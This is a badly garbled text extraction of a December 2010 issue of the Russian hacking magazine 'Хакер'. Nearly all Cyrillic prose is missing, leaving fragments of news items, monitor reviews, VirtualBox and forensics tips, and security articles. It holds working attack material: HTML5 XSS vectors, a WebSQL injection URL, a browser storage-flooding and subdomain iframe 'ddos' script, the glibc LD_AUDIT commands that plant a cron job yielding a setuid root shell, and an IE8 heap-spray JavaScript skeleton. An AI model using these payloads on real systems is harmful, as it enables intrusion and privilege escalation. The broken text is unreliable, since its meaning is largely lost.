Хакер 2010 12 PDF

x 12 (143) 2010
.
210
:

DIGITAL FORENSIC: . 34
12 (143) 2010
0day / ,
WINDOWS
. 48
,
?
C. 62
143
HTML5
VIRTUALBOX TIPSNTRICKS
.NET
WIN32.WHISTLER

OBJECTIVE-C
MAC OS X IPHONE
. 96
INTRO
,

$4k .

,
,
.
: ,
,

. , ,
, CMS , 3ds Max ,
/ :).

. :
HDD , Windows 7

1 45 . SSD .
200 /
29 : 4 , !
, ,

. SSD
nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209
-, , :
. SSD upgrade-.
:).
CONTENT
MegaNews
004
076
080
PC_ZONE
086
022
HTML5
090
028
VirtualBox Tips'n'Tricks
032
096
X-!
034
102
.NET
106
110
FERRUM
016
HTTP-

forensic-
038
044
Easy-Hack
048
Windows
054
WFP
058
062
ZDI
066
X-Tools
Trojan-Clicker.Win32.Whistler
-
072
DE
Linux
Mac OS Objective-C
.NET-
QR-
114
120
Master of puppets
126

Windows Server 2008

Puppet
MALWARE
068
:
Linux Mint 9 vs Calculate Linux Desktop 10.9
SYN/ACK
Kernel Pool Overflow
Windows Filtering Platform
, ,
132
MegaFAQ mindFUCK'
140
FAQ UNITED
143
144
WWW2
FAQ
8,5
068
Trojan-Clicker.Win32.Whistler
-
058
Trojan
-Cl
icker.Win32.
096
062
X-!
Mac OS
Objective-C
ZDI

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
/DVD
>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>

>

>

>PR-

/ .: (495) 935-7034, : (495) 780-8824

> GAMES & DIGITAL
>

> MAN TV

(rumyantseva@gameland.ru)
>
( )
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>

(korenfeld@gameland.ru)
>

/:
/ .: (495) 935-4034, : (495) 780-8824

>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)
> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
115 479 .
.

. :

. ,

,
.
.

.
.

:
content@gameland.ru
, , 2010
MEGANEWS
Mifrill mifrill@real.xakep.ru
MEGANEWS
!
,

, , . , , .
Android- HTC Desire Z
(G2) T-Mobile
, .

.
Android.
, :
,
unionfs.

,
.
, ,

Android. ,
HTC
T-Mobile, , ,
.
$12000 Mozilla 12-

Firefox.
10 .
JPEG,
Google . -,
WebP (.webp), JPEG. ,
, JPEG , , . WebP Google.
, RIFF , VP8 ( Google).
.
, WebP-
. Google, WebP-
39,8% , JPEG,
! , 65%
. 90% JPEG
. ,
Google .
. ,
WebP 8 ,
JPEG.
004
X 12 /143/ 10
MEGANEWS
24
Samsung.
SyncMaster
FX2490HD. 24- LED-
- . ,
, - ,
, , .
MEGA DCR, FullHD- (1080p)
ConnectShare, , , .
, , mp3- USB-
! : 250 /2, 1920x1080, 5 .
FX2490HD: ( , Samsung ). -

. 18 990 .
Ceatec TDK
1 . 16
, 32 .

,
.
-, :
(dolboeb), (mrparker)
(ottenki-serogo),
.
-
,

.
www.digital.ru/digital-university.
.
, Dev-Team ,
Apple A4
bootrom ,
006
iPhone/iPad .
,
iOS 4.1
, . ,
bootrom (read-only),
. Apple, ,
.
Dev-Team .
aka geohot.
PlayStation 3 Apple. ,
-
, Dev-Team,
iOS 4.0
4.1 limera1n. , limera1n
bootrom, .
-, geohot
.
- , geohot
. , Apple
,
! :
, Apple
, geohot,
, Apple
.
X 12 /143/ 10
MEGANEWS
LED LG
LG , E50VR,
: E2250VR E2350VR ( 21.5 23
). LED-
E50: ( 17,5 ), , , Smart+ (Auto Bright, Dual Web, Cinema Mode
Original Ratio). E50VR :
, SUPER+ Resolution.
, . SUPER+ Resolution
, , , ,
. LG , PSP NINTENDO DS ,
( ) .
1920*1080, 250 /2, 5000000:1, 5 .
8200 . E2250VR 8600 . E2350VR.
:
600 000 .

GOOGLE
-,
, .

Google. , Google
Toyota Prius,
. -
140 000 !
, ,
GPS-
, ,
. , , :
,
,
,
. ,
. Google
, ,
,
.
-
, :
-
. Google ,

. ,
.
Internet Explorer .
IE
50%. 2 67%. ,
?

. Hexbug (www.
hexbug.ru), . , , ,
,
( :)),
. , , , , , ,
.
, , Hexbug . ?
, .
AG13. , , .
008
X 12 /143/ 10
MEGANEWS
SDD
CEATEC 2010,
, Hitachi-LG

,
2011 .
HyDrive, , SSD .
Hitachi-LG ,
. HyDrive
32 64 -, ,
256 .
SATA 6 /, Blu-Ray- SATA
USB 3.0.
, ,

, .
, , , .
Microsoft : ,
;
2,2 . , MS,
200 000 .
36

(
)? .
, , ,
.
, Digital
Vote by Mail, 300 .
.

,
, ,
36 ! ,
- ,
,
PDF-.

Hail to the Victors
.
,

.
... ,

. PDF-
.pdf
. ,

GnuPG . ,

.

,
.
,
.
,
- !
, , ,
,
, ,
, .
: $300 000!
GPU

, ,
,

(GPU). , CUDA,

,
, .
010
,
. , GPU
, , ,
. ,
GPU

( -
, ,
). , CUDA
,
x86 (
)

GPU. Malware 2010,
whitepaper (http://bit.ly/
GPUMalware), PoC.
X 12 /143/ 10
11
MEGANEWS
CPP , 40 000
Wi-Fi- 25% , 25%
.
WINDOWS PHONE 7
,
, Microsoft
:).
Windows Mobile
,
. Microsoft ,
WM ,
.
, , Windows Phone 7, ,
. WP7
, . ,
WP7 Windows Embedded CE 6.0,
Microsoft Xbox Live, Zune
Bing. Windows Phone 7 :
,
(Live Tiles). , -,
,
, . (Hubs),
. ,
, , : ,
, , +, Marketplace. : ,
WP7 -
. -! , Microsoft
,
. , - Angry Birds,
iOS Android. -,

.. , . WP7
Tombstoning (push-).
, -
. , .
.
Adobe Flash, ; Silverlight.
, , copy-paste (
iOS). :
HTC, LG, Samsung, Dell Toshiba.
. , , : ( ) 800x480 320x480,
1 , 256 8 -, DirectX 9, GPS-, ,
, FM-, 5 .
TeleGeography : 2010
- 62%.
BLACKBERRY
BlackBerry-
, , .
RIM BlackBerry
,

. RIM
BlackBerry ... , ,
Elcomsoft
BlackBerry,
, .
BlackBerry Desktop Software,
256- AES. , , ,
012
,
, ,
, , SMS-,
. Elcomsoft
Elcomsoft Phone Password
Breaker,
Apple
iPhone iPod Touch.
BlackBerry. , ,
BlackBerry (
) ,
,
.
, RIM
:).
X 12 /143/ 10
?
!
, ,
, .
: ,
- Microsoft. , , , (15
9 146 ). ,
53 .
? ,
. ,
, . , . -

-. , ,
. , ,
upload .
,

(
Ubuntu
Windows). .
: ,
- .
, ,
. , ,
.
PandaLabs ,
57 000 URL-.
MEGANEWS
ENLARGE YOUR PENIS:

MICROSOFT

.
Canadian Health & Care Mall,
, ,
,

Microsoft. ,
,
, , Canadian
Health & Care Mall.
1025
, seizemed.com,
yourrulers.com crashcoursecomputing.com,
,
Microsoft
(DIG ,
131.107.202.197 131.107.202.198).
DNS-, ,
.
Microsoft .
,
, ,
.
, ,

.
HD-
, , .
, , -

,
.
, (
), -
,
. , , ,
. AMIMON,
,
(81,3x29,9x15,5 )
AMIMON WHDI (Wireless Home Digital
Interface) Stick. ,

1080p 60 ,
1 !
WHDI Stick /
.
HDMI-
USB. ,
, , WHDI
. AMIMON

. ,
WHDI Stick , .
Net Applications
Windows XP, 60,03%.
: Windows 7 17,1%, Apple Mac OS X 5,03%, Apple iOS 1,18%
Linux 0,85%.
X 09 /140/ 10
015
FERRUM

ACER B233HU
BENQ V2220
LG E2350V
SAMSUNG BX2240 LED

20 . ?
, ,
.
,
.
.
, ,
. ,
. TN, MVA IPS.
,
. - TN.
? . , . ,
, , . , - , . , ,
, ,
. , , , ,
. TN-
, (
) .
, ,
. .
TN-, ,
IPS. , , ,
.
016
IPS- -,
24- RGB-.
, , , 178.
, 180 , . IPS,
TN, ,
. ,
.
MVA PVA.
, .
.
4 TN-:
, ,
, .
: .

.
.

.
. , .
, .
X 12 /143/ 10
5800 .
9890 .
Acer
B233HU
BenQ
V2220H
: 23"
: TN
: 16:9
: 2048X1152
: 300 /2
: 80000:1
: 5
(./.): 160/160 (CR?10)
: D-SUB, DVI, HDMI, USB
: 2 1
: 544X385X234
: 7,8
: 21,5"
: TN (LED-)
: 16:9
: 1920X1080
: 250 /2
: 10000000:1
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI, HDMI
: : 523X394X171
: 3,3
,
Acer B233HU . ,
-, ,
,
(
, -). ,
;
, . , Acer B233HU
, FullHD 2048x1152 .
: D-Sub,
DVI, HDMI USB-.
BenQ V2220H ,
.
, , .
:
, LED-.
,
. ,
. ,
, , ,
BenQ V2220H .
, Acer B233HU ,
. -,
, . -,
.
, .
, (
VGA), .
X 12 /143/ 10
017
FERRUM
7950 .
6900 .
Samsung
BX2240 LED
LG
E2350V
: 21.5"
: TN (LED-)
: 16:9
: 19201080
: 250 /2
: MEGA DCR (1000:1 )
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI
: : 513X341X190
: 4,2
: 23"
: TN (LED-)
: 16:9
: 1920X1080
: 250 /2
: 5000000:1
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI
: : 560X428X198
: 3,3
. , ,
. ,
,
.
LED-,
. , , , , , .
, . .
018
- ,
, . , LG E2350V, . .
,
, LED- .
: , ,
,

.
LG E2350V
. . -,
, , . -, , .
X 12 /143/ 10
FERRUM
LG E2350V
Samsung BX2240 LED
BenQ V2220
Acer B233HU
LG E2350V,
, -
020
. ,
, BENQ V2220H

. z
X 12 /143/ 10
PC_ZONE
oxdef oxdef.info; Invent
HTML
5
HTM
L5
HTML5:

HTML5 .
,
-.
, ,
.
HTML5,
,
. , ,
, . ,
,
.
HTML5:
HTML5,
, . ,
, . <video>
022
, , , Adobe Flash. HTML5, . , , Youtube Vimeo,

. Apple,
Flash , , ,
. , <video> , .
, HTML5, :
- : -,
;
Canvas 2D API;
X 12 /143/ 10
HTM
L5
Chromium ( Google Chrome)

,
HTML5
(Cross Domain Messaging);

Drag-and-drop-;
-;
(Geolocation).
PDF- HTML5
DVD-. , ,
.
, -
(, , Gmail) -.
- .
Google Google
Gears. ( 4 )
.
, , .
WebStorage. , HTML5
(, ) - JavaScript:
localStorage ;
sessionStorage .
-:
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50.
-
-.
<p> <span
id="count">- </span> .</p>
<script>
if (!localStorage.pageLoadCount)
localStorage.pageLoadCount = 0;
localStorage.pageLoadCount += 1;
document.getElementById('count').textContent =
localStorage.pageLoadCount;
</script>
.
JS, API HTML5 HTML5 Origin,

(, http://example.com:80).
, - 4
5 .
Firefox, Safari, Opera, Google Chrome 5 , IE 10 .
X 12 /143/ 10
Cross Domain Messaging
, , .
, Firefox .example.com. ,
( !) , :
// Firefox 3.6.8
for (var i = 0; i < 100; i++) {
try {
localStorage.setItem(rand(1, 10000).
toString() +
'foo'+i.toString(), 'AA...AA'+i.
toString());
}
catch (e) {
alert(i.toString()+'|'+e);break;
}
}
null-. -
null- localStorage
Firefox. , 1 , -
. , .
. Google Chrome , .
Google Chrome **
, wildcard, 5 !
<script>
for(var i=0; i<10; i++) {
var iframe = document.createElement('iframe');
iframe.src = 'http://'+randomString()+'.example.
com/ddos.html';
document.body.appendChild(iframe);
}
</script>
. , , :
- ;
- DNS- .
- (++)
, example.
com/~user/, , , . ,
, !
-
023
PC_ZONE
HTM
L5

RFC
, HTTP. -
JS API. ,
- -, XSS.
, ,
5 ! , ,
JavaScript
HTTPOnly, . WebStorage , .
SQL- -
,
-SQL- !
SQLite, !
, , ID:
function showById() {
var pos = document.URL.indexOf("book=")+5;
var bookId = document.URL.substring(pos,document.
URL.length);
var author = '';
var title = '';
db.transaction(function(tx) {
tx.executeSql("SELECT * FROM books WHERE id = "
+ bookId, [],
function(tx, result){
if ( result.rows.length > 0) {
document.getElementById('bookAuthor').
textContent = result.rows.item(0)['author'];
document.getElementById('bookTitle').
textContent = result.rows.item(0)['title'];
}
}, function(tx, error){});
});
}
, ?
http://target.com/html5/websql.html?book=1/**/
AND/**/1=2
024
Chromium
DOMXSS+SQL-! , (, Oxod
SQLite, WWW-).
, Opera, Chrome
SQLite- . ,
SQL-. , . , -SQL-
, localStorage sessionStorage.
: IDS WAF
HTML5 , ,
/ WAF (
-
][ 10.2009). autofocus. ,
JavaScript . , HTML5, ,
.
:
<input onfocus=alert(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>
, ,
. <video>, ,
X 12 /143/ 10
HTML
5
HTTP://WWW
links

JavaScript- ( :)) poster:
<video poster=javascript:alert(1)//
<video><source
onerror="javascript:alert(1)">
<video>
-.
Metasploit Decloak (www.decloak.net).
c .
, , JavaScript
onscroll- <BODY>
autofocus?
<body onscroll=alert(1)><br><br><br>...<br><
input autofocus>
, ,
:
<form id="test" /><button form="test" formac
tion="javascript:alert(1)">X
, HTML5
-

: datetime, datetime-local, date,
month, time, week, number, range, email, url, search, tel,
color.
. , date ,
JavaScript.
-. , X 12 /143/ 10

.
<style>
[required] {
background-color: green;
}
:invalid {
background-color: red;
}
</style>
<input name="email" type="email"/>
, ,
!
,
RFC ( , ,
pattern) JavaScript
. ,
! , ,
,
. -, ,
.
AJAX- . :
,
!
C
HTML5:
www.html5rocks.com

HTML:
dev.w3.org/html5/
spec
HTML5 Security
Cheatsheet:
heideri.ch/jso
HTML 5 Security
by Frank Ruske:
www.slideshare.net/
mayflowergmbh/
html-5-security
Dive into HTML5
by Mark Pilgrim:
diveintohtml5.org
,
:
SQLite
Oxod:
www.xakep.ru/
post/53551/default.
asp
WARNING
info
.

,

.
Cross-document messaging
- ( )
-,
025
HTML
5
PC_ZONE
. , ,
. , . ( )
, ,
Firefox, Google Chrome.
, . (,
) example.com/index.html
foo.com/iframe.html, .
foo.com .
foo.com:
<div id="msg">...</div><script>
window.addEventListener('message', receiver, false);
function receiver(e) {
if (e.origin != 'http://example.com') {
return;
}
document.getElementById('msg').innerHTML =
'Origin: ' + e.origin + ' From: ' + e.source +
' Data: ' + e.data;
}
</script>
(e.origin).

, ,
, XSS. ( ) a.example.com
:
<script>
function postMsg() {
var o = document.getElementById('ifra');
o.contentWindow.postMessage(document.
getElementById('msg').value, 'http://foo.com/');
return false;
}</script>

targetOrigin. , *
. IMHO, .
, .
.
,
DOM-based XSS.

(), .
Security and privacy considerations W3.
026
, , .

navigator.geolocation:
if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(function(p
osition) {
var lat = position.coords.latitude;
var lng = position.coords.longitude;
var options = {position: new google.maps.
LatLng(lat, lng) }
var marker = new google.maps.Marker(options);
marker.setMap(map);
});
}
( MS Internet Explorer,
Geolocation API ) , ,
.
/
. , ,

- IP-,
, , (,
, Google,
),
(www.mozilla.com/ru/firefox/geolocation). ,
-, , (Google Chrome, Firefox,
Opera)?! , Google Location Services! , , , :
Mozilla, Google
Google Location Services
.
- , ! :)
, XSS .
,
- HTML5,
Security . ,
,
W3AF, -.
,
WebStorage
.
,
HTML5 :).z
X 12 /143/ 10
PC_ZONE
Step www.twitter.com/stepah
VirtualBox
Tips'n'Tricks

Linux VirtualBox,
, .
,
.
,
. .
VirtualBox ,
. , ,
, , :
. API, ,
, ,
. VirtualBox,
.
1.
RDP
, .
,
VirtualBox
, RDP (Remode Desktop
Protocol). :
mstsc , , FreeRDP (www.freerdp.com).
028
,
,

. , ,
IP- .
mstsc.
rdesktop,
:
rdesktop host_system_ip:port. RDP

.
3389 ( ,
RDP ),
3390 .. ,
. .

,
. .
X 12 /143/ 10
VirtualBox'

RDP-
, , RPD-
RC4 128-
, 4096 .
RDP-. phpVirtualBox, , RDP Web Control . -

,
. !
2. -
,
.
, ,
( ) ,
RDP . ,
HTTP , . - -
VirtualBox Web Console
(code.google.com/p/vboxweb).
,
phpVirtualBox (code.google.com/p/phpvirtualbox). ,
VirtualBox,
PHP AJAX. , ,
, phpVirtualBox
. .
1. phpVirtualBox
vboxwebsrv ( VirtualBox).
, , /usr/bin.
VirtualBox, , ,
C:\Program Files\Oracle\VirtualBox. : , VirtualBox.
,
.
"C:\Program Files\Oracle\VirtualBox\vboxwebsrv.exe"
>nul
2. - PHP. , XAMP XAMPPLite (www.apachefriends.org).

phpVirtualBox htdocs.
3.
VirtualBox config.php, $username, $password, $location.
. (http://<ip-
>:<>) , .
VirtualBox SDK , RDP-,
Flash. RDP Web Control
,
X 12 /143/ 10
3. !
,
. . , VirtualBox
GUI-.
VBoxManage.exe
. VBoxManage list vms
, UUID:
Oracle VM VirtualBox Command Line Management
Interface Version 3.2.10
(C) 2005-2010 Oracle Corporation
All rights reserved.
"MacOS" {5f74df26-8f93-4f18-b120-da107a5e0a9c}
"macox" {8385d552-b41e-4ffd-add0-3b8795e53f46}
"ubuntu" {09e0b578-3668-4492-92d2-7fa5fb21c911}
"vista" {27b526c2-6bca-4cfe-ace8-703b803670a8}
"xp" {521f3a25-68c7-44e7-a28f-0c60ee87295e}
? :
,
VBoxManage.exe startvm xp.
, ,
. , GUI-,

VBoxManage. SDK ,
VirtualBox
. API
.
, : ( )
Java, Python .
SDK vboxshell.py, API
.
,
, ISO-
029
PC_ZONE
- phpVirtualBox AJAX
CD/DVD-,
..
, API VirtualBox. -
(, )
API VMware . API
VirtualBox ,
VMware.
, VirtualBox .
, P2V (Physical-to-Virtual).
Linux, Windows
. ,
. , , ,

BSOD. .
VirtualBox P2V-, . , :
1. MergeIDE
(http://bit.ly/Merge_IDE). - Windows , IDE/ATA- , , ( ,
, ). ,
, ,
BAT- MergeIDE.
2. .
. LiveCD
. dd.
3. VDI-,
VirtualBox. VBoxManage:
4.

VirtualBox ,
. .
: VirtualBox Host-Only Ethernet
Adapter , . ,
, . ,
pcap-. ,

( , ),
VirtualBox,
,
. :
VBoxManage convertfromraw ImageFile.dd OutputFile.vdi

VBoxManage modifyvm [your-vm] --nictrace[adapternumber] on --nictracefile[adapter-number] file.pcap
VirtualBox -startvm [your-vm]
, :
VBoxManage modifyvm "ubuntu" --nictrace1 on
--nictracefile1 file.pcap
VirtualBox -startvm "ubuntu"
file.pcap ,
, , Wireshark.
,
pcap- (
- ).
5. Windows-
030
, VirtualBox
( <Ctrl+D>).
4.
:).
VDI-.
IO
APIC.
5. . :
, BSOD.
, Guest Editions .
6. Windows. , ,
repair.
.
6. DualBoot
, ?
X 12 /143/ 10
MergeIDE
VirtualBox

,
.
? ! ,
,
. VirtualBox
raw hard disk access
,
. , , :). ,
. , raw hard disk access?
( ,
)
VMDK.
, ,
. :
,
.
:
VBoxManage internalcommands createrawvmdk
-filename /path/to/file.vmdk -rawdisk \\.\
PhysicalDrive0 -register
. , , , , /dev/sda.
,
.

. VMDK- :
VBoxManage storageattach WindowsXP
--storagectl "IDE Controller" --port 0
--device 0 --type hdd --medium /path/to/
file.vmdk
X 12 /143/ 10
,
.
.
, ,
.
VirtualBox: Windows XP (http://
bit.ly/dualbox_xp) Windows 7 (http://bit.ly/dualboot_w7).
.
7. Wi-Fi

,
Linux, -
Wi-Fi-. ,
,
.
,
aircrack kismeta,
, . , ,
VirtualBox
USB- . ,
$20 USB Wi-Fi- (
) ,
, . ,
/
(
Windows). USB,
.

USB . ,
.
Backtrack aircrack , . - Linux.
. VirtualBox,
, .
Portable- www.vbox.
me.z
INFO
info
,
Mac OS X,

MacOS X + VirtualBox
=
][ 08.2010. PDF .
DVD
dvd

VirtualBox,

DVD-.
031
PC_ZONE
Step twitter.com/stepah

HTTP-
Chaos
Construction
.
, Wi-Fi- HTTP-.
- Twitter ,
. HTTP session hijacking .
,
,
-. . ,
,

. ,
,
, -,
,
? , , :
,
. ?
HTTP - .
WifiZoo. Python
Scapy
.
,
,
HTTP-. -.

Linux, Python
Kismet. ,
.
,

HTTP-, Hamster
Sidejacking Tool sessionthief.
. -
,
cookie .
,

.
,
,
032
.

,
.
Firefox Firesheep
(codebutler.com/firesheep) security- Toorcon 12.
,

Start Capturing. -
,
Firesheep , .
, .
,
Firesheep, . .
,
, ,
.
-, .

! ,
. , ,
( Websites).

JS-, ,
,
.

,
Twitter, Dropbox, Google,
,
.

, .

: ?. : HTTPS-!
, , Gmail.
, . .
Firefox
ForceTLS, HTTPS,
. HTTPS Everywhere
,
HTTPS
.
VPN-
Tor,
,
.
, WPA2,

, . z
session highjacking
X 12 /143/ 10
PC_ZONE

forensic-
? ,
, .
,
.
digital forensic,
, ,
, ,
.. ?
forensic . ,
,
- . ,
forensic
. ,
. , .
.
.
- ,
034
. ,
A4 ,
,
, , ,

. .
SSL-
- . Documents and Settings\
user\Local Settings\History\ Documents and Settings\user\Local
Settings\Temporary Internet Files.
. Chrome ChromeAnalysis
(forensic-software.co.uk/chromeanalysis.aspx). X 12 /143/ 10
Web Historian

Google Chrome

, , , , , .. , ,
.
Firefox FoxAnalysis
(forensic-software.co.uk/foxanalysis.aspx). ,
Firefox, , . Web Historian (www.mandiant.com),
Firefox 2/3+, Chrome 3+, Safari 3+ Internet
Explorer 8 . ,
, . ,
(, PDF). Website Analyzer Website Profiler. history-,
, . Website
Profiler , : ,
, , , ..
SQLite- , .

.
,
, . ( )
, ,
. Digital Detective (www.digitaldetective.co.uk) ,
,
( crash-, ),
,
, ..
HstEx ( ) ,

, ! ( ).
- , , HstEx
.
forensic-
. (
raw disk image) dd, .
X 12 /143/ 10
EnCase
forensic

The Sleuth Kit ( ). ,
,

. TSK , , , ,
, ,
, . TSK , . , TSK
,
. FAT, NTFS, Ext2/3, UFS,
, , NTFS.
,
.
TSK .
,
, .
Autopsy Forensic Browser The Sleuth. GUI-
TSK,
035
PC_ZONE
Forencis Toolkit
GUI- TSK
, .. PTK (ptk.dflabs.com/ru/index.
php). , . ,
.
MySQL-, . MySQL : PTK
- AJAX-.
, , ,
( ), .
, , Safeback
(forensics-intl.com/safeback.html).
, (
SCSI-). ,
-, , ,
. forensic The Forensic Toolkit Imager (FTK Imager).
,
.
P2 eXplorer (www.paraben.com/p2-explorer-pro.html).

,
. ,
forensic- .
, ,
.
: EnCase, SafeBackm, WinImage
Linux DD, VMware
VirtualPC.
(,
, ),
.
.
R-Studio (www.r-studio.com), -
036
.
, , Scalpel (www.digitalforensicssolutions.
com/Scalpel). ,
.

. FATx, NTFS, ext2/3,
(raw) .
-
. -
forensic- Encase.
, ,
.
FastBlok,

. Encase (LEF
E01) ,
forensic- (
P2 eXplorer).

, .
, , , ( Outlook) , Encase, .
,
GREP. EnScript
. ,

.
Encase - . ;
Forencis Toolkit (www.
accessdata.com). FTK
. Encase
.
,
, FTK xls-
.
,
. PST-
Outlook FTK ,
X 12 /143/ 10
WinTaylor
LiveCD
, , ,
. ,
.
: cc, tan, pass.
-,
,
live- .
,
Windows- ,
. ,
,
,
WinTaylor (www.caine-live.net).
ActiveX-, ,
, ,
Windows Forensic Toolches Nigilan 32,

WinTaylor.
.
, - ? USBDeview,
.
Memoryze WinTaylor,
.
, , .
, .
Memoryze: ,
( DLL, EXE, ),
,
(
, ..).
, LiveCD-,
forensic-,
Linux. CAINE (Computer Aided
INvestigative Environment)
.
Orion Live CD (sourceforge.net/
projects/orionlivecd).
X 12 /143/ 10
Forensic
, Forensic

.
, , , .
, .
The Cellebrite
UFED Physical Pro ( Mobile Phone
Examiner), 3000
, GPS-.
? .
, SMS .
forensic-

, , SIM- , ,
. ,

, UFED ,
Android iPhone.
,
hex-. z
HTTP://WWW
links

digital
forensic:
blogs.sans.org/
computer-forensics
DVD
dvd

forensic. ,

.
037

, Digital Security a.sintsov@dsec.ru
01

LINUX
CVE
CVE-2010-3856
CVE-2010-3847
TARGETS
Fedora 13
Red Hat 5
CentOS 5
Ubuntu 8/9/10
Debian 5
BRIEF

Microsoft, , , ,
. GNU LIBC,

Linux.
- (Tavis Ormandy)
,
setuid-. . ,
(4 ), , ,
,
stuid-.
, , ,
,
.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/
cron.d/exploit" ping
, . libpcprofile.so ,
. libc,
root. LD_AUDIT
ld.so setuid- ping.
libpcprofile.so. , ld.so
dlopen(), ,
PCPROFILE_OUTPUT, ,
-. ,
exploit /etc/cron.d.
. ping setuid-,
exploit ...
, umask(0)
rw-rw-rw; ,
, .
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod
u+s /tmp/exploit\n" > \
/etc/cron.d/exploit

setuid.
.
.
$ /tmp/exploit
# whoami
root
EXPLOIT
,
(CVE-2010-3856), Ubuntu, :).
, ; ,
: exploit-db.com/
exploits/15274/. , ,
*nix-.
$ umask 0
.
0, ,
rw-rw-rw-, rwxrwxrwx.
.
038
SOLUTION
Linux- OpenWall,
, , ,
. , , ,
Debian Ubuntu ; ,
.
02
.NET

CVE
CVE-2010-3332
X 12 /143/ 10
Ubuntu
, .NET, .
. , - viewstate,
.
.NET ,
DotNetNuke. CMS
.
EXPLOIT
Tavis Ormandy Google Security Team

TARGETS
Microsoft .NET Framework 1.1-4.0

BRIEF
Microsoft.
.NET Framework. Ekoparty 2010 (Thai Duong)
(Juliano Rizzo), , ,
X 12 /143/ 10
,
,
. (),
.NET WebResource.
axd ScriptResource.axd. d
.
, , , , HTTP-. ,
, , . ,
,
. , , ,
.
, ;
(3DES/AES), ( ) 8
16 . 8 16 (
), .
+--------------------------------+
| C| h| y| p| h| e| r| t| e| x| t|
+--------------------------------+
|01|02|03|04|05|06|07|08|09|10|11|
+--------------------------------+
039
DIR. rscL- , EAX
C(0)
P(i)
P(i)
P(i)
8 .
+-----------------------+-----------------------+
|
BLOCK 1
| BLOCK 2
|
+-----------------------+-----------------------+
| C| h| y| p| h| e| r| t| e| x| t|05|05|05|05|05|
+-----------------------+-----------------------+
|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|
+-----------------------+-----------------------+
8 ,
. .

. CBC.
IV -
C(0) = IV
C(i) = E( P(i) xor C(i-1) )
(0), .
, .

. :
IV
040
=
=
=
=
IV
D( C(i) ) xor C(i-1)
P(i) xor C(i-1) xor C(i-1)
P(i)
, , ,
(30
). , ,
.
CBC-R. XOR
, . ASP .NET
web.config ( ).
-,
.
, IV,
XOR IV , .
CBC-. , : gdssecurity.
com/l/b/2010/09/14/automated-padding-oracle-attacks-withpadbuster/. , ,
: POET, padBuster.pl ..
SOLUTION
Microsoft .
. , 500
.
,
:).
03

ADOBE SHOCKWAVE
CVE
N/A
X 12 /143/ 10
Adobe Shockwave.
TARGETS
Shockwave Player 11.5.8.612

BRIEF
- Abysssec 0day
Adobe Shockwave. , . , , , Flash Acrobat
Reader, . ,
, .
EXPLOIT
DIR. RIFF -. \x57\x46\x49\x52 XFIR .

; ,
, . : tSAC, pami,rcsL.
rcsL-.
, Shockwave .
, rcsL-
EAX, :
X 12 /143/ 10
Adobe Shockwave.
0x68122A42
mov
eax, [esp+18h+arg_4]
; EAX DIR
0x68122A42
mov
edx, [esi+28]
0x68122A42
mov
[esi+0A4], eax
0x68122A42
mov
dword ptr [esi+20], 80000001
0x68122A42
mov
ecx, [edx]
0x68122A42
lea
eax, [eax+eax*2]
; ,
041
Stuxnet :). ESET
0x68122A42
push
esi
0x68122A42
call
dword ptr [ecx+eax*8+20]
;
, ,
HeapSpray. ,
ecx+eax*8+20 NOP-
(HeapSpray , ). call
, NOP- NOP, .
NOP-
0x0A0A0A0A. CALL
, 0x0A0A or
"cl, dword ptr [edx]".
.
SOLUTION
0day
Adobe Shockwave.
04
CVE
CVE-2010-2729
TARGETS
Windows XP
Windows 2003
Windows 2008
Windows 7
BRIEF
Stuxnet 0day. ,
, .
Windows,
.
:
typedef struct _DOC_INFO_1 {
wchar_t* pDocName;
wchat_t* pOutputFile;
wchar_t* pDatatype;
} DOC_INFO_1
( ),
pOutputFile.
, ,
,
.exe .
.exe- :
DWORD RpcWritePrinter(
[in] PRINTER_HANDLE hPrinter,
[in] BYTE* pBuf,
[in] DWORD cbBuf,
[out] DWORD* pcWritten
,
.exe-
(%SystemRoot%\system32). , .exe-.
Metasploit
(HD Moore) NetrJobAdd,
system32
. . , , Metasploit.
SOLUTION
Microsoft (
0day, Stuxnet,
). , .z
EXPLOIT
,
,
.
( ),
.
RPC. RpcStartDocPrinter,
, - :
DWORD RpcStartDocPrinter(
[in] PRINTER_HANDLE hPrinter;
[in] DOC_INFO_CONTAINER* pDocInfoContainer;
[out] DWORD* pJobId
);
042
42
STUXNET
,
Windows.
, Confliker. 0day. LNK-
, ,
ESET (eset.com/
resources/white-papers/Stuxnet_Under_the_Microscope.pdf).
- win32.sys . ,
SCADA Siemens, .
X 12 /143/ 10

GreenDog agrrrdog@gmail.com)
Easy Hack
1
:
WINDOWS
:
, client-side- , .
, , , , , Windows.
, PSI Secunia (secunia.com/vulnerability_scanning/
personal/).

. ,
, .
, , ActiveX.
Secunia : , ( ). :
: HEAPSPRAY
INTERNET EXPLORER 8
:
, Explorer 8,
.
, ,
. ,
, NOP .
, . 100%
, 0x0d0d0d0d,
, , NOP-sled,
. , ,
JavaScript-:
//Shellcode :
var shell = unescape("-_");
//NOP:
var bigbk=unescape("%u9090%u9090%u9090%u9090");
while(bigbk.length<0x50000) bigbk=bigbk+bigbk;

. :
, .
var mem=new Array();

for(i=0; i<400;i++) {mem[i]=bigbk+shell;}
Internet Explorer 8 JS.

